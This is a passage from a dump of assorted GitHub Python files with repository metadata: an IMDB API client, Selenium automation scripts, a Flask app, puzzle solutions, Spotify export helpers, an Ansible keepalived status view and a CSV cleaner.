\"https://imdb8.p.rapidapi.com/title/get-plots\"\n \n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n plot = response[\"plots\"][1][\"text\"]\n return(plot)\n \n#print(get_medium_plot(\"tt0110912\"))\n#\n#def get_long_plot(movie_id):\n# url = \"https://imdb8.p.rapidapi.com/title/get-plots\"\n# \n# querystring = {\"tconst\":movie_id}\n# \n# headers = {\n# 'x-rapidapi-host': HOST_NAME,\n# 'x-rapidapi-key': API_KEY\n# }\n# \n# response = requests.request(\"GET\", url, headers=headers, params=querystring)\n# response = response.json()\n# plot = response[\"plots\"][2][\"text\"]\n# return(plot)\n# \n#print(get_long_plot(\"tt0110912\"))\n\ndef get_movie_year(movie_id):\n '''\n Gets the year of release of a movie from IMDB rapidAPI \n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n Integer\n The year of a movie\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_year = response[\"year\"]\n \n return(movie_year)\n\n#print(get_movie_year(\"tt0110912\"))\n\n\ndef get_movie_title(movie_id):\n '''\n Gets the title of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The title of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_title = response[\"title\"]\n \n return(movie_title)\n\n#print(get_movie_title(\"tt0110912\"))\n\ndef get_movie_details(movie_id):\n '''\n Gets all details of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n JSON\n JSON list containing movie title, id, image URL, image width, running time in minutes, title, title type and year\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n movie_details = response.json()\n #movie_title = response[\"title\"]\n \n return(movie_details)\n \n#print(get_movie_details(\"tt0110912\"))\n\ndef get_running_time(movie_id):\n '''\n Gets the running time of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The running time in minutes of a movie\n \n '''\n \n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n movie_running_time = response[\"runningTimeInMinutes\"]\n \n return(movie_running_time)\n\n#print(get_running_time(\"tt0110912\"))\n\ndef get_poster_url(movie_id):\n '''\n Gets the URL which contains the poster of a movie from IMDB rapidAPI from it's ID\n \n Parameters:\n movie_id(String): The id of a movie\n Returns:\n \n String\n The URL of a movie poster\n \n '''\n url = \"https://imdb8.p.rapidapi.com/title/get-details\"\n\n querystring = {\"tconst\":movie_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n poster_url = response[\"image\"][\"url\"]\n \n return(poster_url)\n\n#print(get_poster_url(\"tt0110912\"))\n\n\n##NOT WORKING!!!\ndef get_actor_pic_url(actor_id):\n '''\n Gets the URL of an actor from IMDB rapidAPI from it's ID\n \n Parameters:\n actor_id(String): The id of an actor\n Returns:\n \n String\n The URL of a picture of an actor\n \n '''\n url = \"https://imdb8.p.rapidapi.com/actors/get-bio\"\n\n querystring = {\"nconst\":actor_id}\n \n headers = {\n 'x-rapidapi-host': HOST_NAME,\n 'x-rapidapi-key': API_KEY\n }\n \n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response = response.json()\n actor_pic_url = response[\"image\"][\"url\"]\n \n return(actor_pic_url)\n\n#print(get_actor_pic_url(\"nm0001667\"))\n","repo_name":"karlgospel/IMDB_Movie_API","sub_path":"api_movies.py","file_name":"api_movies.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"19933078224","text":"#encoding:utf-8\n\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\ndirver_path = r\"C:\\www\\chromedriver\\chromedriver.exe\"\n\ndriver = webdriver.Chrome(executable_path=dirver_path)\ndriver.get(\"https://www.baidu.com/\")\ninputTag = driver.find_element_by_id('kw')\nsubTag = driver.find_element_by_id('su')\n\nactions = ActionChains(driver)\n#让输入框获取焦点\nactions.move_to_element(inputTag)\nactions.send_keys_to_element(inputTag,'苍老师现在怎么样了')\nactions.move_to_element(subTag)\nactions.click(subTag)\n\nactions.perform()","repo_name":"gaohj/szpython_1812","sub_path":"day6/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"36946542857","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common import keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.common.exceptions import NoSuchElementException\r\n\r\n\r\ndriver = webdriver.Chrome('C:\\\\webdrivers\\\\chromedriver.exe')\r\ndriver.get('https://www.speedtypingonline.com/typing-test')\r\n \r\nfor j in range(1, 10000000):\r\n for i in range(0, 4):\r\n for k in range(1, 1000): \r\n try:\r\n toSend = driver.find_element_by_xpath('//*[@id=\"blockLine'+str(i)+'\"]/span['+str(k)+']').text\r\n except NoSuchElementException:\r\n break\r\n\r\n if(toSend == ' '):\r\n toSend = ' '\r\n actions = ActionChains(driver)\r\n actions.send_keys(toSend)\r\n actions.perform()\r\n \r\n","repo_name":"Zachariah-Abraham/speedtypingonline_bot","sub_path":"ST.py","file_name":"ST.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"8410000657","text":"#!/usr/bin/python3\n#-*-coding:utf-8-*-\n\n__all__ = ['log', 'filehash', 'filetime', 'pathmake']\n\nimport os\nimport time\nimport socket\nimport hashlib\nimport threading\nimport uuid\n\n'''日志内容统一输出'''\ntlock = threading.Lock()\ndef log(txt):\n tlock.acquire()\n print(\"\" + time.strftime('%Y-%m-%d %H:%M:%S') + \" \" + format(txt))\n tlock.release()\n\n'''文件的哈希值sha1计算'''\ndef filehash(fp):\n if not os.path.isfile(fp):\n return ''\n \n while True:\n try:\n f = open(fp, 'rb')\n except PermissionError:\n time.sleep(1)\n continue\n else:\n break\n \n hh = hashlib.sha1()\n while True:\n b = f.read(8096)\n if not b:\n break\n hh.update(b)\n f.close()\n return hh.hexdigest()\n\n\n'''判断文件是否完整'''\n'''\ndef fileover(fp):\n #若文件大小正在变动则延迟一下PermissionError\n s1, s2 = 0, 1\n while s1 != s2:\n print(s1)\n s1 = os.stat(fp).st_size\n time.sleep(1)\n s2 = os.stat(fp).st_size\n return s1\nfileover(r'D:\\shell\\test\\Y470Y470PY570_WIN7x64.exe')\n'''\n \n'''无异常递归移动文件或文件夹'''\n'''def surechange(path):\n pass'''\n\n'''无异常递归删除文件或文件夹'''\n'''def suredelete(path):\n pass'''\n\n'''无异常递归创建文件夹'''\n'''def surecreate(path, fp=None):\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n return True'''\n\n'''\n获取可视化文件尺寸\nB/KB/MB/GB/TP/PB/EB/ZB/YB/BB\n'''\ndef getsize(byte, assoc=False):\n assert byte >=0\n size, unit = (0, 'B')\n if byte < 1024:\n size, unit = (byte, 'B')\n elif byte/1024 < 1024 :\n size, unit = (byte/1024, 'KB')\n elif byte/1048576 < 1024 :\n size, unit = (byte/1024/1024, 'MB')\n elif byte/1073741824 <= 1024 :\n size, unit = (byte/1024/1024/1024, 'GB')\n elif byte / 1099511627776 <= 1024 :\n size, unit = (byte/1024/1024/1024/1024, 'TB')\n else:\n size, unit = (byte/1125899906842624, 'PB')\n\n if assoc == True:\n return (size, unit)\n\n return '%.2f %s'%(size, unit)\n\n\ndef getname():\n return socket.getfqdn(socket.gethostname())\n\ndef getip(ifname='lo', ipv6=False):\n #环回地址:局域网IP\n return socket.gethostbyname(socket.getfqdn(socket.gethostname()))\n \n #主机地址:城域网IP\n '''import fcntl, struct\n skt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n inet = fcntl.ioctl(skt.fileno(), 0x8915, struct.pack('256s',ifname[:15]))\n return socket.inet_ntoa(inet[20:24])'''\n\ndef getmac(sep='-'):\n mac = uuid.UUID(int=uuid.getnode()).hex[-12:]\n return sep.join([mac[e:e+2] for e in range(0,11,2)]).upper()\n\n\n'''根据主机ID和序列号产生当前机器的唯一标识符'''\ndef computer():\n return str(uuid.uuid1())\n\n'''产生随机UUID'''\ndef uniqid():\n return str(uuid.uuid4().hex)\n\n \nif __name__ == '__main__':\n log(\"RUN:\")\n log(filehash('utils.py'))\n\n\n #surechange(r'D:\\shell\\test\\dd')\n #suredelete(r'D:\\shell\\test\\dd')\n #surecreate(r'D:\\shell\\test\\dd')\n\n print(getsize(1024))\n print(getsize(1048576))\n print(getsize(1073741824))\n print(getsize(1099511627776))\n\n\n print(getname())\n print(getip())\n print(getmac())\n\n print(computer())\n print(uniqid())\n\n","repo_name":"backtent/syncfiles","sub_path":"lansync/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"27485013932","text":"import argparse\n\nfrom utils import read_trans_prompts, read_transfile\n\n\ndef get_data(fname: str, srcfname: str, tgtfname: str, prefix: str) -> None:\n \"\"\"\n This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\n For training data, it combines the prompt with all accepted translations. \n For dev or test data, it combines the prompt only with the most popular translation.\n \"\"\"\n\n with open(fname) as f:\n lines = f.readlines()\n d = read_transfile(lines, strip_punc=False, weighted=True)\n id_text = dict(read_trans_prompts(lines))\n\n with open(srcfname, \"w\") as src, open(tgtfname, \"w\") as tgt:\n for idstring in d.keys():\n\n # prompt is combination of id and text.\n prompt = id_text[idstring]\n ats = d[idstring]\n\n # make sure that the first element is the largest.\n ats = sorted(ats.items(), key=lambda p: p[1], reverse=True)\n\n # if it is train\n if prefix == \"train\":\n # write all pairs.\n for p in ats:\n print(prompt, file=src)\n print(p[0], file=tgt)\n else:\n # write just the first pair (evaluate only on first line.)\n top_ranked_text = ats[0][0]\n print(prompt, file=src)\n print(top_ranked_text, file=tgt)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"This converts data in the shared task format into standard machine translation format (one sentence per line, languages in separate files.)\")\n parser.add_argument(\"--fname\", help=\"Path of shared task file (probably something like train.en_vi.2020-01-13.gold.txt)\", required=True)\n parser.add_argument(\"--srcfname\", help=\"Name of desired src file, probably something like train_sents.en\", required=True)\n parser.add_argument(\"--tgtfname\", help=\"Name of desired tgt file, probably something like train_sents.vi\", required=True)\n parser.add_argument(\"--prefix\", help=\"One of [train, dev, test]\", choices=[\"train\", \"dev\", \"test\"])\n args = parser.parse_args()\n\n get_data(args.fname, args.srcfname, args.tgtfname, args.prefix)\n","repo_name":"duolingo/duolingo-sharedtask-2020","sub_path":"get_traintest_data.py","file_name":"get_traintest_data.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"35"}
+{"seq_id":"9863162868","text":"from flask import Flask, render_template, url_for\napp = Flask(__name__)\n\nposts = [\n {\n 'author': 'Hameem N',\n 'title': 'Corona Teport',\n 'content': 'First post content',\n 'date_posted': 'April 20, 2018'\n },\n {\n 'author': 'Abc',\n 'title': 'dsdsdsd',\n 'content': 'Second post content',\n 'date_posted': 'April 21, 2018'\n }\n]\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html', posts=posts)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"hameemtirur/Corona","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"19067807524","text":"# ~*~ coding: utf-8 ~*~\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport json\nfrom django.views.decorators.csrf import csrf_protect\nimport os\n\nimport unittest\nimport sys\nimport re\n\nsys.path.insert(0, \"../..\")\n\nfrom ops.ansible.runner import AdHocRunner, CommandRunner\nfrom ops.ansible.inventory import BaseInventory\n\nhost_data = [\n {\n \"hostname\": \"keepalived1\",\n \"ip\": \"172.20.100.68\",\n \"port\": 22,\n \"username\": \"root\",\n \"groups\": [\"keepalived\"],\n #\"password\": \"stu@python\",\n },\n {\n \"hostname\": \"keepalived2\",\n \"ip\": \"172.20.100.71\",\n \"port\": 22,\n \"username\": \"root\",\n \"groups\": [\"keepalived\"],\n #\"password\": \"stu@python\",\n }\n]\n\ndef keepnet(request):\n return render(request, \"architecture/keepnet.html\")\n\n\nclass GetKeepIpaddr():\n def setUp(self):\n inventory = BaseInventory(host_data)\n runner = AdHocRunner(inventory)\n \n tasks = [\n {\"action\": {\"module\": \"shell\", \"args\": \"ip addr\"}, \"name\": \"ip_addr\"},\n {\"action\": {\"module\": \"shell\", \"args\": \"systemctl status keepalived\"}, \"name\": \"keepalived_ip\" },\n ]\n ret = runner.run(tasks, \"all\")\n keepIpList = []\n for x,y in ret.results_raw[\"ok\"].items():\n if re.search('Sending gratuitous ARP', y['keepalived_ip']['stdout'].split('\\n')[-1]):\n keepIpList.append(\n [y['keepalived_ip']['stdout'].split('\\n')[-1]+ \" ++ \",\n y['ip_addr']['stdout'].split('2: eth0')[-1].replace(\"\\n\", \" \")]\n )\n \n return keepIpList\n\ndef get_keep(request):\n if request.is_ajax():\n getIpaddr = GetKeepIpaddr()\n if getIpaddr.setUp() == []:\n receipt = json.dumps({\"status\": 1, \"info\": \"没有查询到或内部错误!\"})\n else:\n receipt = json.dumps({\"status\": 1, \"info\": getIpaddr.setUp()})\n\n return HttpResponse(receipt)\n","repo_name":"itcp/ly-cmdb","sub_path":"apps/architecture/views/keepnet.py","file_name":"keepnet.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"16347571923","text":"import unittest\n\nclass test_file(unittest.TestCase):\n\n def test_write01(self):\n file01 = open(\"file01.txt\", \"w\", encoding='utf-8')\n num = file01.write( \"第一行 \\n 第二行\" )\n print(num)\n file01.close()\n\n def test_write02(self):\n file02 = open(\"file02.txt\", \"rb+\")\n file02.write( b\"ancasgsdgdfkgktwelwklkerkgkjgksljr\" )\n # 移动到文件的第六个字节\n file02.seek(5)\n str01 = file02.read(1)\n print(str01)\n # 移动到文件的倒数第三字节\n file02.seek(-3, 2)\n str02 = file02.read(1)\n print(str02)\n file02.close()\n\n def test_read01(self):\n file01 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str01 = file01.read()\n print(str01)\n file01.close()\n\n def test_read02(self):\n file02 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str02 = file02.readline()\n print(str02)\n file02.close()\n\n def test_read03(self):\n file03 = open(\"file01.txt\", \"r\", encoding='utf-8')\n str03 = file03.readlines()\n print(str03)\n file03.close()\n\n def test_read04(self):\n file04 = open(\"file01.txt\", \"r\", encoding='utf-8')\n for line in file04:\n print(line, end='')\n file04.close()","repo_name":"ghoobo/python_study","sub_path":"com/ghoobo/basis/test_12_file.py","file_name":"test_12_file.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"4895609779","text":"# coding: utf-8\n\n# p(k) = p(k-1) + p(k-2) - p(k-5) - p(k-7) + p(k-12) + p(k-15) ...\n# 1, 2, 5, 7, ... は一般五角数\n#\n# https://ja.wikipedia.org/wiki/%E5%88%86%E5%89%B2%E6%95%B0\n\nfrom itertools import count, takewhile, cycle\n\n\ndef gen_ex_pentagonal():\n '''拡張五角数を生成する.'''\n for k in count(1):\n n = (3 * k - 1) * k // 2\n yield n\n\n # f(k) = (3k^2 - k) / 2 ==>\n # f(-k) = (3k^2 + k) / 2 ==>\n # = f(k) + k\n n += k\n yield n\n\n\ndef main():\n N = 10**6\n partitions = [1]\n signs = (1, 1, -1, -1)\n for n in count(1):\n p_n = 0\n for sign, k in zip(cycle(signs),\n takewhile(lambda k: k <= n, gen_ex_pentagonal())):\n p_n = (p_n + sign * partitions[n - k]) % N\n if p_n == 0:\n return n\n partitions.append(p_n)\n\n\nif __name__ == '__main__':\n print(main())\n","repo_name":"AkihikoTakahashi/ProjectEuler","sub_path":"Problem078.py","file_name":"Problem078.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"27082646297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom itertools import combinations\n\n# Complete the maximumPerimeterTriangle function below.\ndef maximumPerimeterTriangle(sticks):\n sticks_s = sticks\n perimeter = 0\n lengths = [-1]\n for i, j, k in combinations(range(len(sticks_s)), 3):\n s_i = sticks_s[i]\n s_j = sticks_s[j]\n s_k = sticks_s[k]\n aux_l = sorted([s_k, s_j, s_i])\n aux = sum(aux_l)\n if aux_l[0] + aux_l[1] > aux_l[2] and aux > perimeter:\n lengths = aux_l\n perimeter = aux\n \n return lengths\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n sticks = list(map(int, input().rstrip().split()))\n\n result = maximumPerimeterTriangle(sticks)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"polotto/HackerRank","sub_path":"other-problems/maximum-perimeter-triangle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"38469082740","text":"if __name__ == '__main__':\n print(\"*** Fun with Drawing ***\")\n n=int(input(\"Enter input : \"))\n inverse=bool(0)\n tri=int(1)\n for j in range((n-1)*4+1):\n for i in range ((n-1)*4+1):\n if i None:\n # Make sure the dirs in the filepath exist, create if needed\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n\n sorted_list = sorted(list(data.values()), key=sort_lambda)\n output_rows = [header_row]\n for item in sorted_list:\n output_rows.append(item_to_row_lambda(item))\n\n with open(output_filename, \"wt\") as out_file:\n tsv_writer = csv.writer(out_file, delimiter=\"\\t\")\n tsv_writer.writerows(output_rows)\n\n\ndef track_to_row(item) -> list:\n track_obj = item[\"track\"]\n return [\n track_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], track_obj[\"artists\"])),\n track_obj[\"album\"][\"name\"],\n item[\"added_at\"],\n track_obj[\"id\"],\n ]\n\ndef playlist_track_to_row(item) -> list:\n track_row = track_to_row(item)\n added_by_id = item[\"added_by\"][\"id\"]\n if added_by_id == '':\n # This has come up in debugging with Spotify owned (\"official\") playlists,\n # presumably because they're built different than \"regular\" playlists\n added_by_id = \"\"\n return [*track_row[:-1], item[\"added_by\"][\"id\"], *track_row[-1:]]\n\n\ndef album_to_row(item) -> list:\n album_obj = item[\"album\"]\n return [\n album_obj[\"name\"],\n \", \".join(map(lambda artist: artist[\"name\"], album_obj[\"artists\"])),\n item[\"added_at\"],\n album_obj[\"id\"],\n ]\n\n\ndef playlist_to_row(item) -> list:\n return [\n item[\"name\"],\n item[\"description\"],\n item[\"tracks\"][\"total\"],\n item[\"owner\"][\"id\"],\n item[\"collaborative\"],\n item[\"id\"],\n ]\n","repo_name":"riggspc/spotify-version-snapshots","sub_path":"utils/outputfileutils.py","file_name":"outputfileutils.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"36462081814","text":"\"\"\"\nFunctions to convert timestamps\n==============================\n\n\"\"\"\n\nfrom __future__ import print_function\nimport time\nimport datetime\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport pandas as pd\n\ndef date2datenum(d):\n ## Convert python datetime to Matlab datenum\n ##: input: Date as python datetime object\n ##: return: corresponding datenum\n return 366 + d.toordinal() + (d - dt.fromordinal(d.toordinal())).total_seconds()/(24*60*60)\n\ndef datenum2date(datenum):\n ##Convert Matlab datenum into Python datetime.\n ##:input datenum Date in datenum format\n ##:return:Datetime object corresponding to datenum.\n d=np.array(datenum)\n return pd.to_datetime(d-719529,unit='D')\n\n\ndef calcTime_Mat2DOY(matlab_time):\n #### EXAMPLE OF USE:\n #### pytime = calcTime_Mat2DOY(matlab_time)\n\n print ('Converting MATLAB timesteps to DOY:')\n\n timestamps = pd.to_datetime(matlab_time-719529, unit='D')\n python_time = timestamps.dayofyear + (timestamps.hour / 24.0) + (timestamps.minute / 1440.0) + (timestamps.second / 86400.0)\n\n return python_time\n\ndef calcTime_Date2DOY(date):\n #### date should be forematted as YYYYmmDD\n\n print ('Converting date to DOY:')\n\n mm = date[4:6] #### month\n DD = date[6:8] #### day\n refDateAug = 226 #### Aug reference date for drift: 14th Aug 2018\n refDateSep = 243 #### Sep reference date for drift: 1st Sep 2018\n\n if mm == '08':\n doy = (float(DD) - 14.0) + refDateAug\n elif mm == '09':\n doy = float(DD) + refDateSep\n else:\n print ('****Date not valid with this function****')\n\n print ('----')\n print ('Date = ', date)\n print ('DOY = ', doy)\n print ('')\n\n return doy\n","repo_name":"JuVue/PYTHON","sub_path":"py_functions/time_functions.py","file_name":"time_functions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"25680513514","text":"from ..layer_operation import LayerOperation\r\nimport tensorflow as tf\r\nimport re\r\nfrom initializer import get_initializer\r\nfrom regularizer import get_regularizer\r\n\r\n# WARNING: Only 2D convolution available\r\nclass op_tf_conv(LayerOperation):\r\n\r\n _attributes = \"\"\"[]\"\"\" # TODO: TO BE DEPRECATED\r\n\r\n def compile_time_operation(self, learning_option, cluster):\r\n pass\r\n\r\n def run_time_operation(self, learning_option, cluster):\r\n \"\"\"\r\n define convolution operation for input tensor\r\n outputs:\r\n output: convolution output\r\n \"\"\"\r\n # get input\r\n input_ = self.get_input('input')\r\n indim = self.get_dimension('input')\r\n\r\n # get attr\r\n # required field\r\n kernel_size = self.get_attr('kernel_size', default=None)\r\n if kernel_size is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('kernel_size', self.name))\r\n num_output = self.get_attr('num_output', default=None)\r\n if num_output is None:\r\n raise Exception('[DLMDL ERROR]: {0} in {1} layer must be declared.'.format('num_output', self.name))\r\n\r\n # optional field\r\n padding = self.get_attr('padding', default='VALID')\r\n stride = self.get_attr('stride', default=1)\r\n bias_term = self.get_attr('bias_term', default=True)\r\n initializer = self.get_attr('initializer', default={'weight': {}, 'bias':{}}) # default will set later\r\n regularizer = self.get_attr('regularizer', default={}) # default will set later\r\n dilate = self.get_attr('dilate', default=None)\r\n scope = self.get_attr('scope', default='default')\r\n\r\n # get worker info: worker num, device type, device num\r\n device = self.get_attr('device')\r\n num = re.sub('[^0-9]', '', cluster.get('types')[device])\r\n type = cluster.get('types')[device].replace(str(num), '')\r\n\r\n # get shape array\r\n stride_shape = [stride, stride]\r\n weight_shape = [kernel_size[0], kernel_size[1], indim[3], num_output]\r\n dilate_shape = [dilate, dilate] if dilate is not None else None\r\n bias_shape = [num_output]\r\n\r\n\r\n with tf.variable_scope(self.name):\r\n # get weight for convolution\r\n with tf.variable_scope(scope):\r\n weight_init = get_initializer(initializer.get('weight'), is_bias=False)\r\n weight_reg = get_regularizer(regularizer, scope, is_bias=False)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n else:\r\n weights = tf.get_variable('weights', shape=weight_shape, dtype=tf.float32,\r\n initializer=weight_init, regularizer=weight_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, weights)\r\n\r\n if bias_term:\r\n bias_init = get_initializer(initializer.get('bias'), is_bias=True)\r\n bias_reg = get_regularizer(regularizer, scope, is_bias=True)\r\n if learning_option.get(\"parallel\", None) == \"DP_mb\":\r\n with tf.device('/job:worker/task:{0}/mb:0'.format(device)):\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n else:\r\n biases = tf.get_variable('biases', shape=bias_shape, dtype=tf.float32,\r\n initializer=bias_init, regularizer=bias_reg,\r\n trainable=True)\r\n #tf.add_to_collection(scope, biases)\r\n\r\n # construct API\r\n def apiConstructor():\r\n conv = tf.nn.convolution(input_, weights, padding,\r\n strides=stride_shape, dilation_rate=dilate_shape, data_format='NHWC')\r\n\r\n # if bias_term is True, add bias term to convolution output\r\n if bias_term:\r\n conv = tf.nn.bias_add(conv, biases, data_format='NHWC')\r\n\r\n # get output dimension\r\n outdim = list(conv.get_shape()[i].value for i in xrange(len(conv.get_shape())))\r\n\r\n # set output\r\n self.set_dimension('output', outdim)\r\n self.set_output('output', conv)\r\n\r\n # set tf summary\r\n tf.summary.histogram(self.name, conv)\r\n\r\n with tf.variable_scope(self.name):\r\n # single node, model parallelism: explicit worker mapping\r\n # data parallelism: equally duplicate model\r\n if learning_option.get(\"parallel\", None) != \"DP\":\r\n with tf.device('/job:worker/task:{0}/{1}:{2}'.format(device, type, num)):\r\n apiConstructor()\r\n else:\r\n apiConstructor()","repo_name":"KAIST-NCL/IDLE","sub_path":"src/DLMDL/LayerOperation/tf/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"}
+{"seq_id":"16717185996","text":"## CSV Data Munger/Cleaner/Shaper\n# Created by: Mitch Main\n# Created on: 9/25/14\n# Info: This imports a CSV file to be cleaned, allows you to define the number\n# of fields you would like to import, and then imports them from the file,\n# then it writes it to a cleaned file\n\n# Imports\nimport csv\nimport tkinter\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import asksaveasfilename\nimport string\nimport itertools\nimport re\n\n\n\n## FUNCTION: GetFile()\n# The GetFile function gives the user a GUI interface to get the file directory\n# the function then returns a file directory as a string.\n# @input: From UI Dialog Box\n# @return str: filedir\n# @return int: collumn\n\ndef GetFile():\n filedir = askopenfilename(title='Open File')\n return filedir\n\n\n\n##FUNCTION: TxtWriter(fieldList, headerList)\n# TxtWriter writes the the field lists to the output file as a tab delimited file\n# for easy uploading to a SQL server or to be easily opend by Excel\n# @input List : fieldList\n# @input List : headerList\n# @return file: .txt file in saveas location\n\ndef TxtWriter(fieldList, headerList):\n\n #important variables\n writeList = []\n\n #get filename for writefile and open it\n filename = asksaveasfilename(title='Save As :', defaultextension='.txt')\n with open(filename, mode='w', newline = '') as wfile:\n writer = csv.writer(wfile, dialect='excel-tab')\n\n #write the headers\n if headerList:\n writer.writerow(headerList)\n\n #iterate over the 'rows'\n for row in range(len(fieldList[0])):\n #iterate over the 'collumns'\n for col in range(len(fieldList)):\n writeList.append(fieldList[col][row])\n #end for-loop\n writer.writerow(writeList)\n writeList.clear()\n #end for-loop\n #end with-block\n\n\n\n#FUNCTION: GetUserInput(prompt, errorMessage)\n# This is a helper function to get input and avoid repeating code\n# @input str: prompt\n# @input str: errorMessage\n# @return str: inputString\n\ndef GetUserInput(prompt, errorMessage, typeCheck):\n while True: #Can I say that, this while loop is not my code, and I hate its style. However, it works!\n if typeCheck == 'int':\n try:\n _input = int(input(prompt))\n except ValueError:\n print(errorMessage)\n continue\n else:\n print(\"Valid input\")\n break\n elif typeCheck == 'bool':\n try:\n _input = bool(input(prompt))\n except ValueError:\n print(errorMessage)\n continue\n else:\n print(\"Valid input\")\n break\n #end if-elif block\n #end while-loop\n\n return _input\n\n#FUNCTION: FieldImporter(filedir)\n# This functions grabs the fields by each line and stores them in the dynamic list\n# @input str : filedir\n# @return list: fieldList\n# @return list: headerList\n\ndef FieldImporter(filedir):\n\n #instantiations\n fieldLocations = []\n headerList = []\n\n #Get the number of fields to import\n howManyFields = GetUserInput('How many fields to import? ', 'Not an int', 'int')\n\n #Instantiate the main list\n fieldList = [[] for i in range(howManyFields)]\n\n #get field locations (will account for human counting later)\n print('Input the collumn numbers in the order you want them to appear in the output file')\n print('i.e. If you want the 5th collumn in the 1st collumn of the output list,')\n print('give me 5 as the first entry then list the rest as you like')\n for i in range(howManyFields):\n fieldLocations.append(GetUserInput('Collumn number of field to be 